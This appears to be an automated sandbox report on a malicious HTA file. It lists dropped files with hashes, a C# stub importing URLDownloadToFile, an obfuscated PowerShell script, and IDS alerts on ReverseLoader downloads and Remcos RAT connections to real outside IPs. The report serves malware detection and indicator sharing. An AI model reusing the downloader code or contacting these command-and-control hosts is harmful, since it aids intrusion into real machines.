                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                  File Type:MSVC .res
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):652
                                                                                                                  Entropy (8bit):3.1092473844832593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryUak7YnqqaPN5Dlq5J:+RI+ycuZhNCakSaPNnqX
                                                                                                                  MD5:10DC61A4C12511B5076D3F13198E8032
                                                                                                                  SHA1:14779DF0DBBEA9BBB3D2737810B60944F2F04B50
                                                                                                                  SHA-256:018A3FADEFA8A76CBF3C86DE191666CEFF7574D5DFAAC9A5892B9B2DA774164C
                                                                                                                  SHA-512:E916692DDBA376DADC5D03A026C16DCF2D467D6F1CA477A363D4F198EEC45EEAFF62AFA552A73C48F3876F2D86362B3A606C7F3E25D2E193A9693697FF1718A8
                                                                                                                  Malicious:false
                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.y.1.w.u.0.j.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.y.1.w.u.0.j.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (368)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):484
                                                                                                                  Entropy (8bit):3.733383204515497
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:V/DsYLDS81zuIDIDa0GWmMmbjQXReKJ8SRHy4H3QMCQUWXr9M35OKy:V/DTLDfuDxXfHcEXxMJOKy
                                                                                                                  MD5:48060B02D61C7C41DB2A78DD5BA30307
                                                                                                                  SHA1:7064E1187A73995E4B916AC3D594014D9938A13D
                                                                                                                  SHA-256:12C2558DDDDB21359A0A88E1E7BDD1B2C28CB56435C4F9D9796161A2F60B7BE7
                                                                                                                  SHA-512:E522F64E687F3BA212703D2B8B5E0320E806359EB16A4FA21D08D5E27E858C82A88AABD01B82A816B96378C15013371451366E1A586E13A132DC7D0D2A86F46C
                                                                                                                  Malicious:false
                                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace abfKSsSAD.{. public class ibF. {. [DllImport("UrLMoN.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr oqipTyfEW,string BGlUUEsI,string S,uint itTUxtzs,IntPtr PMl);.. }..}.
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):375
                                                                                                                  Entropy (8bit):5.24885025063046
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fJLQ+0zxs7+AEszIN723fJLQzA:p37Lvkmb6K2ahLV0WZETahLv
                                                                                                                  MD5:B8296F61F0C165D31C0D3F86498D0E03
                                                                                                                  SHA1:D20F35BCDB7D33ECE976D36E8E3A91E3BA485663
                                                                                                                  SHA-256:83C512EC99A245D4C3B00CA909499CEFFEAEF0C251C84AE734A9D2812292E20B
                                                                                                                  SHA-512:1D09ED7B54AC1284C3ED5604BB209FA57A82095CB6799250B88C85F6613ABDFD623214177904098A9C3EBC4F88A214588B35F54195D1B26911CBF5EB72D1D752
                                                                                                                  Malicious:true
                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.0.cs"
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3072
                                                                                                                  Entropy (8bit):2.8293647756644433
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:etGSpmPBe5ekrl8KLkZylYb8TSZMtkZfWwjbCZ0WI+ycuZhNCakSaPNnq:6pVskr+KxO8TSdJWwjbCZX1ulCa3Wq
                                                                                                                  MD5:F5EB493AEF496851839CC8EA0F1E1379
                                                                                                                  SHA1:47736D1C699EA8C177FC3A89682CB8DC879CC036
                                                                                                                  SHA-256:8A08D298EC45944B8164BE977EF10A8AE2B6D7C6150F51BF9E0661571F4EC6BC
                                                                                                                  SHA-512:62AE309A94F994C762217D7E86268497CFBA74E9E32FF94FB6DB8DAEC566635409D0F00C1787BCCE74C9502297ADF00BB935BB2D7C960C15C1F2BCE786F5DFA0
                                                                                                                  Malicious:false
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.[g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................5.......v.....v.......................................... <.....P ......N.........T.....^.....g.....i.....r...N.....N...!.N.....N.......!.....*.......<.......................................%..........<Module>.yy
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):876
                                                                                                                  Entropy (8bit):5.319635132084381
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:KOuqd3ka6K2aLVETaAKax5DqBVKVrdFAMBJTH:yika6CLVE+AK2DcVKdBJj
                                                                                                                  MD5:009A8749BDFF299634178CF764DFF668
                                                                                                                  SHA1:28458585133CB88CA1466616669DBFF40EC55AB9
                                                                                                                  SHA-256:541A7D1BC58171B20B53E00EA95E04872056B7D04EC4EDC61EA44DC68D148C64
                                                                                                                  SHA-512:3E027A997681F6D5FE4AC042F28E62630237D76734A85B6F9D5FC8E72EC6291E08824F8DAF34596E7976CC48E42684DBD85FDA0D1EDBF13475EB3E44244B4800
                                                                                                                  Malicious:false
                                                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (3221), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):153904
                                                                                                                  Entropy (8bit):3.7916333313217825
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:gyGYXHM6cErfuTpT7BgyGYXHM6cErfuTpT1gyGYXHM6cErfuTpT7:7GErSN7B7GErSN17GErSN7
                                                                                                                  MD5:716D2EDD830102BBBAD2CB0A1A0259F1
                                                                                                                  SHA1:720D2DB1E6C8162F89376D06F149237AD8269297
                                                                                                                  SHA-256:5A110B1E0B3424A297618863FFA88A2DE1F09C266687F93DA8E3D7C6DAB48341
                                                                                                                  SHA-512:EDC3624E8071E058981BF47598B654321846A4538D4F64826457108431584021CA901C16278AB74775EF64A377387427A03CD4592B711F624C463BCDB53986CA
                                                                                                                  Malicious:true
                                                                                                                  Preview:...... . . . .....W.O.i.K.t.G.C.e.K.u.h.I.k.i.A. .=. .".d.R.q.n.d.r.W.o.a.W.i.W.K.z.O.".....P.x.k.m.h.A.s.B.t.K.W.K.I.L.h. .=. .".L.k.h.e.I.Q.U.W.W.A.e.Q.z.U.K.".....c.A.O.k.K.j.x.m.L.K.m.k.G.c.T. .=. .".e.Z.G.K.U.m.G.q.U.C.i.G.K.a.i.".........i.K.G.b.j.f.S.p.Z.L.W.J.j.p.m. .=. .".G.c.a.W.K.u.b.g.g.n.G.L.C.P.p.".....O.s.f.L.i.i.W.I.L.u.K.c.n.k.S. .=. .".U.A.c.p.i.d.i.k.K.J.W.h.h.W.m.".....e.f.K.q.p.i.L.f.h.K.L.A.h.c.P. .=. .".m.z.W.U.h.W.Z.z.o.t.p.B.O.W.K.".....e.I.f.e.q.o.L.B.N.Z.K.N.b.d.G. .=. .".J.P.W.a.G.q.C.A.G.N.H.h.p.Z.k.".....k.A.x.g.n.b.i.L.n.z.G.R.c.v.S. .=. .".o.B.W.C.Z.N.u.G.h.p.z.c.f.H.c.".....G.k.U.z.b.L.B.f.Q.z.N.p.f.L.L. .=. .".b.O.i.N.p.L.U.A.h.u.K.f.G.b.c.".....W.p.e.e.i.j.J.i.N.L.C.a.k.a.G. .=. .".W.q.L.p.U.P.a.i.W.K.j.W.d.N.i.".....U.a.K.r.K.W.i.p.O.Z.x.o.o.B.s. .=. .".z.W.A.c.L.U.r.m.z.I.L.e.m.O.U.".....G.k.P.N.G.f.z.z.a.i.t.O.i.L.n. .=. .".q.r.L.A.k.W.U.b.L.g.b.a.i.L.G.".....A.B.j.T.f.j.C.P.W.l.h.u.s.a.U. .=. .".W.L.P.b.U.h.K.K.i.N.S.L.A.U.H.".....m.G.e.K.f.d.t.d.
                                                                                                                  File type:HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
                                                                                                                  Entropy (8bit):2.4638385282510207
                                                                                                                  TrID:
                                                                                                                    File name:creamkissingthingswithcreambananapackagecreamy.hta
                                                                                                                    File size:82'678 bytes
                                                                                                                    MD5:049640aa09b45f8f374ec9fff6e272e5
                                                                                                                    SHA1:ca0990ea3db24491c5a5ce408b921383b0d74db8
                                                                                                                    SHA256:277bce05fe87b2c2edd725dc6bc75c98a9f3d3fc68159a65471625009fe0e9e7
                                                                                                                    SHA512:044cc9e601d6809ae166a99c91656b54fc602d088edba57013f2575ebe2e2dd0200e29335494977479a5ed04d81313d5b4816a7ec419e14df95f773133c9a7cc
                                                                                                                    SSDEEP:768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHA/OxlbVxP7iZ5VQSG/wa3s+RP7i2dfwwwAkKD:tk
                                                                                                                    TLSH:E0837907554BE93C7F87A9FBE33CD92A52C6AD01EF8E890706FC09551AD5F8EB024894
                                                                                                                    File Content Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74
                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-12-13T07:38:26.393804+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.649708192.210.150.2480TCP
                                                                                                                    2024-12-13T07:38:36.827575+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.1.137443192.168.2.649715TCP
                                                                                                                    2024-12-13T07:38:53.629074+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649771104.21.84.67443TCP
                                                                                                                    2024-12-13T07:38:54.029867+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11104.21.84.67443192.168.2.649771TCP
                                                                                                                    2024-12-13T07:38:54.029867+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21104.21.84.67443192.168.2.649771TCP
                                                                                                                    2024-12-13T07:38:54.999503+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1104.21.84.67443192.168.2.649771TCP
                                                                                                                    2024-12-13T07:38:57.484695+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649778107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:00.557990+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649788107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:03.635150+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649794107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:06.714457+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649801107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:09.795351+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649810107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:12.870517+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649818107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:15.949037+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649827107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:19.026891+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649836107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:22.129857+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649843107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:25.217756+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649851107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:28.292064+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649860107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:31.369970+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649869107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:34.452551+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649876107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:37.526346+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649885107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:40.604671+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649892107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:43.699447+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649900107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:46.780365+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649909107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:49.855713+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649917107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:52.952850+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649925107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:56.046189+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649934107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:39:59.468403+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649943107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:02.593669+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649951107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:05.693031+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649958107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:08.796633+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649966107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:11.872217+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649974107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:14.964552+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649983107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:18.199825+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649990107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:21.277536+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649998107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:24.355592+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650006107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:27.434885+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650015107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:30.512640+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650018107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:33.691995+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650019107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:36.765951+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650020107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:39.817468+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650021107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:42.824567+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650022107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:45.793353+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650023107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:48.750424+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650024107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:51.668613+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650025107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:54.585616+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650026107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:40:57.449727+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650027107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:00.590897+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650028107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:03.405549+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650029107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:06.220764+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650030107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:09.028196+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650032107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:11.763701+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650033107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:14.501227+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650034107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:17.204841+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650035107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:19.876654+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650036107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:22.528370+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650037107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:25.173375+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650038107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:27.798618+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650039107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:30.449599+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650040107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:33.032754+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650041107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:35.613608+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650042107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:38.138463+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650043107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:40.676629+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650044107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:43.185847+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650045107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:45.707695+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650046107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:48.217483+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650047107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:50.687440+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650048107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:53.138305+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650049107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:55.591617+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650050107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:41:58.057647+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650051107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:42:00.828623+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650052107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:42:03.248163+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650053107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:42:05.655495+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650054107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:42:08.045202+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650055107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:42:10.421554+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650057107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:42:12.828519+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650058107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:42:15.191736+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650059107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:42:17.546059+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650060107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:42:19.874365+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650061107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:42:22.311362+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650062107.173.143.1014646TCP
                                                                                                                    2024-12-13T07:42:24.639244+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650063107.173.143.1014646TCP
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 13, 2024 07:38:25.163310051 CET4970880192.168.2.6192.210.150.24
                                                                                                                    Dec 13, 2024 07:38:25.283294916 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:25.283391953 CET4970880192.168.2.6192.210.150.24
                                                                                                                    Dec 13, 2024 07:38:25.283585072 CET4970880192.168.2.6192.210.150.24
                                                                                                                    Dec 13, 2024 07:38:25.403287888 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:26.393687010 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:26.393726110 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:26.393735886 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:26.393804073 CET4970880192.168.2.6192.210.150.24
                                                                                                                    Dec 13, 2024 07:38:26.393851995 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:26.393862963 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:26.393872976 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:26.393883944 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:26.393896103 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:26.393919945 CET4970880192.168.2.6192.210.150.24
                                                                                                                    Dec 13, 2024 07:38:26.393919945 CET4970880192.168.2.6192.210.150.24
                                                                                                                    Dec 13, 2024 07:38:26.393963099 CET4970880192.168.2.6192.210.150.24
                                                                                                                    Dec 13, 2024 07:38:26.394057035 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:26.394095898 CET8049708192.210.150.24192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:26.394110918 CET4970880192.168.2.6192.210.150.24
                                                                                                                    Dec 13, 2024 07:38:26.394154072 CET4970880192.168.2.6192.210.150.24
